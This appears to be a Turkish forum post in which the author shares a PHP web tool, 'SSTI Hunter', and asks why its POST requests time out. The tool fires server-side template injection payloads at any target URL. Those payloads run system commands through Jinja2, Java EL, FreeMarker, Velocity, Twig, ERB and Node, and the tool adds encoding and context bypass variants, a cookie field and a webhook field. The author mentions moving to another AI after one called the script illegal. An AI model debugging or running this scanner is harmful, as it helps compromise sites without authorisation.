Şöyle bir scriptim var arkadaşlar. Şimdi mantık şu bir input alanı var ve benim verdiğim listedekileri deniyor ve bana sonuclar cıkartıyor. bu GET isteği olanlarda sorun yok ama POST isteği olanlarda timeout hatası alıyorum. v47 yaptı gemini. hala calismiyor chatgpt de illegal diyor.
<?php
/**
* SSTI Hunter v43.0 - pwdec "THE ABSOLUTE OVERLORD: FINAL SINGULARITY"
* Mimari: Multi-Method Atomic Scan & Full Context Bypass
* Platform: cPanel, XAMPP, Localhost Optimized
*/
ini_set('display_errors', '1');
error_reporting(E_ALL);
if (!extension_loaded('curl')) die("CRITICAL: CURL is missing!");
set_time_limit(0);
ini_set('memory_limit', '2G');
class FinalSingularity {
public static function getDatabase($w = "") {
$w = rtrim($w, '/');
// Tüm mermiler burada, hiçbirini silmedim.
return [
"Delimiters & Basics" => ['{{7*7}}', '${7*7}', '{7*7}', '[% 7*7 %]', '{@7*7}', '{# 7*7 #}', '{% 7*7 %}', '<' . '%= 7*7 %>', '<' . '% 7*7 %>', '[[7*7]]', '@@(7*7)', '{{= 7*7 }}', '[# 7*7 #]'],
"Python (Jinja2/Mako/Django)" => [
'{{' . 'config.items()}}', '{{' . 'self.__dict__}}',
'{{' . '().__class__.__mro__[1].__subclasses__()[396](\'id\',shell=True,stdout=-1).communicate()[0].decode()}}',
'${' . 'next(c for c in ().__class__.__base__.__subclasses__() if c.__name__ == "CatchWarnings").__init__.__globals__["sys"].modules["os"].popen("id").read()}'
],
"Java (EL/FreeMarker/Velocity)" => [
'${' . 'T(java.lang.Runtime).getRuntime().exec(\'id\')}',
'${' . '"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("").exec("id")}',
'<#assign ex="freemarker.template.utility.Execute"?new()>${ex(\'id\')}',
'#set($str="exp")#set($exec=$str.class.forName("java.lang.Runtime").getRuntime().exec("id"))'
],
"PHP (Twig/Smarty/Blade)" => [
'{{' . 'dump(app)}}', '{{' . '["id"]|filter("system")}}',
'{{' . '_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}',
'{' . 'smarty.template_vars}'
],
"Ruby & JS (ERB/EJS/Slim)" => [
'<' . '%= `id` %>', '<' . '%= IO.popen(\'id\').read %>', '<' . '%- 7*7 %>',
'{{' . 'constructor.constructor(\'return process\')().mainModule.require(\'child_process\').execSync(\'id\')}}'
],
"Others (Go/Rust/Razor)" => ['@Model.Value', '@(7*7)', '{{ . }}', '[[ 7*7 ]]', '{{7*7}}']
];
}
public static function applyMatrix($p, $opts) {
$m = ['Raw' => $p];
if (in_array('url', $opts)) $m['URL'] = urlencode($p);
if (in_array('double', $opts)) $m['D-URL'] = urlencode(urlencode($p));
if (in_array('hex', $opts)) { $h = ''; for($i=0;$i<strlen($p);$i++) $h .= '%' . dechex(ord($p[$i])); $m['Hex'] = $h; }
if (in_array('uni', $opts)) { $u = ''; for($i=0;$i<strlen($p);$i++) $u .= '\\u00' . dechex(ord($p[$i])); $m['Unicode'] = $u; }
if (in_array('dec', $opts)) { $d = ''; for($i=0;$i<strlen($p);$i++) $d .= ord($p[$i]) . ','; $m['Decimal'] = rtrim($d, ','); }
if (in_array('ctx', $opts)) { $m['Ctx_SQ'] = "';" . $p . ";//"; $m['Ctx_DQ'] = "\";" . $p . ";//"; $m['Ctx_Tag'] = "}}" . $p . "{{"; }
return $m;
}
}
$results = [];
$stats = ['total' => 0, 'vuln' => 0, 'start' => microtime(true)];
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['launch'])) {
$target = $_POST['url'];
$params = array_filter(array_map('trim', explode(',', $_POST['params'])));
$webhook = $_POST['webhook'] ?? "";
$opts = $_POST['opts'] ?? ['url'];
$method = $_POST['method'];
$cookies = $_POST['cookies'] ?? "";
$headers = array_filter(array_map('trim', explode("\n", $_POST['headers'])));
$only_vuln = isset($_POST['only_vuln']);
$db = FinalSingularity::getDatabase($webhook);
foreach ($params as $pr) {
foreach ($db as $cat => $list) {
foreach ($list as $raw) {
$vars = FinalSingularity::applyMatrix($raw, $opts);
foreach ($vars as $mode => $final) {
$stats['total']++;
$ch = curl_init();
$payload_data = ["$pr" => $final];
$url = $target;
if ($method === 'GET') {
$url .= (strpos($url, '?') ? '&' : '?') . http_build_query($payload_data);
} else {
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload_data));
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
}
$curl_configs = [
CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 15,
CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_HEADER => 1, CURLOPT_COOKIE => $cookies
];
if ($headers) $curl_configs[CURLOPT_HTTPHEADER] = array_merge($curl_configs[CURLOPT_HTTPHEADER] ?? [], $headers);
curl_setopt_array($ch, $curl_configs);
$resp = (string)curl_exec($ch);
$info = curl_getinfo($ch);
curl_close($ch);
$body = substr($resp, $info['header_size']);
$v = preg_match('/49|uid=|root:|etc\/passwd|TemplateRuntimeError/i', $body);
if ($v) $stats['vuln']++;
if (!$only_vuln || $v) {
$results[] = [
'p' => $pr, 'cat' => $cat, 'm' => $mode, 'pld' => $final,
'st' => $info['http_code'], 'len' => strlen($body), 'v' => $v, 'u' => ($method === 'GET' ? $url : $target)
];
}
if ($info['http_code'] == 500) usleep(250000);
gc_collect_cycles();
}
}
}
}
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<title>SSTI Sovereign Final v43.0</title>
<style>
:root { --bg: #0d1117; --card: #161b22; --border: #30363d; --blue: #58a6ff; --neon: #39ff14; --text: #c9d1d9; --gray: #8b949e; }
body { background: var(--bg); color: var(--text); font-family: -apple-system, system-ui, sans-serif; padding: 20px; font-size: 13px; margin: 0; }
.box { background: var(--card); border: 1px solid var(--border); border-radius: 8px; padding: 25px; margin-bottom: 20px; box-shadow: 0 8px 24px rgba(0,0,0,0.5); }
h1 { color: var(--blue); font-size: 18px; border-bottom: 1px solid var(--border); padding-bottom: 15px; margin-top: 0; font-weight: 600; text-transform: uppercase; }
input, select, textarea { background: #0d1117; border: 1px solid var(--border); color: #fff; padding: 12px; border-radius: 6px; width: 100%; margin-bottom: 15px; outline: none; transition: 0.2s; }
input:focus { border-color: var(--blue); }
.checks { display: flex; gap: 15px; flex-wrap: wrap; margin-bottom: 15px; font-size: 11px; color: var(--gray); }
.btn { background: #238636; color: #fff; border: none; padding: 18px; width: 100%; border-radius: 6px; font-weight: 700; cursor: pointer; text-transform: uppercase; transition: 0.2s; }
.btn:hover { background: #2ea043; box-shadow: 0 0 20px rgba(57, 255, 20, 0.2); }
.stats-bar { display: grid; grid-template-columns: repeat(4, 1fr); gap: 15px; margin-bottom: 20px; }
.stat-item { background: var(--card); border: 1px solid var(--border); padding: 15px; border-radius: 8px; text-align: center; }
.stat-val { display: block; font-size: 20px; font-weight: 800; color: var(--blue); }
table { width: 100%; border-collapse: collapse; border: 1px solid var(--border); border-radius: 6px; overflow: hidden; }
th { background: #1b1f24; padding: 12px; text-align: left; color: var(--gray); font-size: 11px; }
td { padding: 10px; border-bottom: 1px solid var(--border); font-family: 'Consolas', monospace; font-size: 12px; }
.v-row { background: rgba(57, 255, 20, 0.1) !important; color: var(--neon); font-weight: bold; }
.action-btn { background: #21262d; border: 1px solid var(--border); color: var(--blue); padding: 5px 10px; border-radius: 4px; cursor: pointer; font-size: 11px; text-decoration: none; margin-right: 5px; }
</style>
</head>
<body>
<div class="box">
<h1>>> pwdec_SSTI_SOVEREIGN_v43.0</h1>
<form method="POST">
<div style="display:grid; grid-template-columns: 2fr 1fr; gap:15px;">
<div><label>Target URL</label><input type="text" name="url" placeholder="https://site.com/view" required></div>
<div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;">
<div><label>Params</label><input type="text" name="params" value="id,template,q" required></div>
<div><label>Method</label><select name="method"><option>GET</option><option>POST</option><option>PUT</option><option>DELETE</option></select></div>
</div>
</div>
<div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;">
<div><label>Cookies</label><input type="text" name="cookies" placeholder="session=xyz;"></div>
<div><label>Webhook (OOB)</label><input type="text" name="webhook" placeholder="https://webhook.site/..."></div>
</div>
<div class="checks">
<label><input type="checkbox" name="opts[]" value="url" checked> URL Enc</label>
<label><input type="checkbox" name="opts[]" value="double" checked> Double URL</label>
<label><input type="checkbox" name="opts[]" value="hex" checked> Hex</label>
<label><input type="checkbox" name="opts[]" value="dec" checked> Decimal Bypass</label>
<label><input type="checkbox" name="opts[]" value="ctx" checked> Context Bypass</label>
<label style="color:var(--blue)"><input type="checkbox" name="only_vuln" checked> Sadece Başarılılar</label>
</div>
<button type="submit" name="launch" class="btn">Execute Absolute Final Strike</button>
</form>
</div>
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<div class="stats-bar">
<div class="stat-item"><span class="stat-val"><?= $stats['total'] ?></span><span style="font-size:10px; color:var(--gray);">TOTAL TESTS</span></div>
<div class="stat-item"><span class="stat-val" style="color:var(--neon)"><?= $stats['vuln'] ?></span><span style="font-size:10px; color:var(--gray);">VULNS FOUND</span></div>
<div class="stat-item"><span class="stat-val"><?= round(microtime(true) - $stats['start'], 2) ?>s</span><span style="font-size:10px; color:var(--gray);">DURATION</span></div>
<div class="stat-item"><span class="stat-val"><?= count($results) ?></span><span style="font-size:10px; color:var(--gray);">REPORTED</span></div>
</div>
<div class="box">
<table>
<thead><tr><th>Param</th><th>Engine</th><th>Mode</th><th>ST</th><th>Size</th><th>Payload</th><th>Actions</th></tr></thead>
<tbody>
<?php if (empty($results)) echo '<tr><td colspan="7" style="text-align:center; color:var(--gray);">Hiçbir bulgu yok.</td></tr>'; ?>
<?php foreach($results as $r): ?>
<tr class="<?= $r['v'] ? 'v-row' : '' ?>">
<td><?= htmlspecialchars($r['p']) ?></td><td><?= $r['cat'] ?></td><td><?= $r['m'] ?></td>
<td><?= $r['st'] ?></td><td><?= $r['len'] ?> B</td>
<td style="max-width:250px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap;"><?= htmlspecialchars($r['pld']) ?></td>
<td>
<button class="action-btn" onclick="navigator.clipboard.writeText('<?= addslashes($r['pld']) ?>'); alert('Kopyalandı!')">COPY</button>
<a href="<?= $r['u'] ?>" target="_blank" class="action-btn">GO</a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<?php endif; ?>
</body>
</html>